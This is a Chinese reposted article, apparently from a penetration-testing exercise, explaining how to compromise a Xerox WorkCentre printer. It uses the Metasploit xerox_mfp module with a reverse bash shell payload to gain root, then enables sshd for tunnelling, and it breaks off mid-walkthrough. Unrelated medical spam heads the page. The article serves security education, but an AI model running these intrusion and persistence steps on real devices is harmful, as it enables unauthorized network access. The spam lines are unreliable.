人流价格一般多少人流价格一般多少 治疗妇科病最好医院治疗妇科病最好医院

案例剖析:针对打印机的APT攻击

来源:互联网
更新时间:2016/12/9 11:14:10
责任编辑:李志喜
字体:

一直以来我们都在讨论多功能打印机(MFP)在企业环境下所带来的风险,以及攻击者如何轻易的利用其来进行恶意攻击,比如通过LDAP提取Windows Active Directory的证书或者滥用“扫描文件”和“扫描电子邮件”功能。

而在最近一次我们的攻防演练中,在通过MFP设备攻击Windows Active Directory时,我们利用该设备隐藏了我们的位置,这使得针对MFP设备的攻击进入了新的阶段。在本文中我们就来分享一下如何利用被盗用的Xerox Workcentre MFP设备来进行APT的细节。

点击图片看大图中国学网 www.xue163.com

498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 445px; height: 218px" border="0" alt="案例剖析:针对打印机的APT攻击" src="http://img.xue163.com/s5images51cto/wyfs02/M00/79/81/wKiom1aTGzHD47x9AADioI9mLF0843.jpg" width="513" height="244" />

首先我们要确定该Xerox Workcentre MFP设备在已经被入侵的网络中很容易受到固件注入攻击。实际上该技术早在2012年就已经被发表了,但由于缺乏对这一类物联网设备的强制性更新,目前仍有大量的Xerox Workcentre MFP设备会受到这种攻击,这一点可以很容易的通过Metasploit中的xerox_mfp模块来进行验证。而如果设备并不容易遭受攻击,或者攻击的结果只能够进行打印等操作,那显然是毫无价值的。但是如果它存在严重漏洞可以使你获得反向shell并最终拿到该设备的Root权限,那就相当的有价值了。

以下将向您展示通过Metasploit中的xerox_mfp模块来实施此类攻击。

[1]在Metasploit中选择 xerox_mfp 模块:

Use exploit/unix/misc/xerox_mfp
(http://www.rapid7.com/db/modules/exploit/unix/misc/xerox_mfp)

[2]接下来选择反向 bash payload 模块并使用它:

Set payload cmd/unix/reverse_bash

[3]最后使用以下命令设置目标IP和本地IP:

set RHOST ipaddress
set LHOST ipaddress

[4]这里建议你设置 wfsdelay 到30,因为当你在进行攻击时打印机有可能进入睡眠模式,这样做可以在你等待会话连接到监听器时增加延时。

set wfsdelay 30

[5]一旦完成上面的操作,你就可以通过输入或者运行exploit来启动exploit。

Xerox exploit将会启动固件注入攻击并返回一个可以接入MFP root权限的远程shell。

如下图所示:

点击图片看大图中国学网 www.xue163.com

498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 484px; height: 396px" border="0" alt="案例剖析:针对打印机的APT攻击" src="http://img.xue163.com/s1images51cto/wyfs02/M01/79/80/wKioL1aTG1-gw_L0AAFMgu2wqko979.jpg" width="529" height="435" />

建立并启用SSHD

当你获得了该MFP设备的root访问权限后,需要进行一些必要的配置,以便能够启用SSH隧道。第一步是建立SSH主机密钥,使你可以启动MFP设备上的SSH进程。

具体步骤如下:

输入以下命令来生成dsa和rsa密钥对:

ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key
ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key

当有提示要输入密码时直接回车,下图是生成密钥的一个例子:

点击图片看大图中国学网 www.xue163.com

498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 431px; height: 211px" border="0" alt="案例剖析:针对打印机的APT攻击" src="http://img.xue163.com/s2images51cto/wyfs02/M01/79/80/wKioL1aTG2CgRx-iAAGrrJUgQtM924.jpg" width="540" height="273" />

现在你可以使用下面的命令开启SSH的进程:

/usr/sbin/sshd

而当其开始运行后,如下命令可以进行验证:

www.xue163.com true /5/59665.html report 4295 案例剖析:针对打印机的APT攻击,一直以来我们都在讨论多功能打印机(MFP)在企业环境下所带来的风险,以及攻击者如何轻易的利用其来进行恶意攻击,比如通过LDAP提取WindowsActiveDirectory的证书或者滥用“扫描文件”和“扫描电子邮...
最近关注
首页推荐
热门图片
最新添加资讯
24小时热门资讯
案例剖析: 打印机案例剖析 打印机
精彩资讯
精彩推荐
热点推荐
真视界
精彩图片
社区精粹
关于本站 | 广告服务 | 手机版 | 商务合作 | 免责申明 | 招聘信息 | 联系我们
Copyright © 2004-2016 Xue163.com All Rights Reserved. 中国学网 版权所有
京ICP备10044368号-1 京公网安备11010802011102号
荐闻 | 学网头条知识问答 | 装修 | 作业 | 荐闻 | 学网头条精彩微信 | 新闻中心 | 软件教室 | 设计大全 | 网络相关 | 英语学习 | 开发编程 | 考试中心 | 参考范文 | 管理文库 | 营销中心 | 站长之家 | IT信息中心 | 商学院 | 数码大全 | 硬件DIY | 企业服务 | 网吧在线 | 问吧 | 百科 | 硬件知识 | 本网视点 | 文库 | 手机 | 平板 | 汽车 | 游戏 | 家电 | 精彩摄影 | 时尚科技 | 现代家居 | IT女人 | 经验 | 每日新闻 | 健康养生 | 图书馆 | 猎奇 | 精彩看点 | 图库 | 新闻中心 | 软件教室 | 设计大全 | 网络相关 | 英语学习 | 开发编程 | 考试中心 | 参考范文 | 管理文库 | 营销中心 | 站长之家 | IT信息中心 | 商学院 | 数码大全 | 硬件DIY | 企业服务 | 网吧在线 | 问吧 | 百科 | 硬件知识 | 本网视点 | 文库 | 手机 | 平板 | 汽车 | 游戏 | 家电 | 精彩摄影 | 时尚科技 | 现代家居 | IT女人 | 经验 | 每日新闻 | 健康养生 | 图书馆 | 精彩微信 | 猎奇 | 精彩看点 | 图库编程 方案 信息windows方案windows answer文档机构教育文档问答中心IT编程数码信息解决方案信息中心IT科技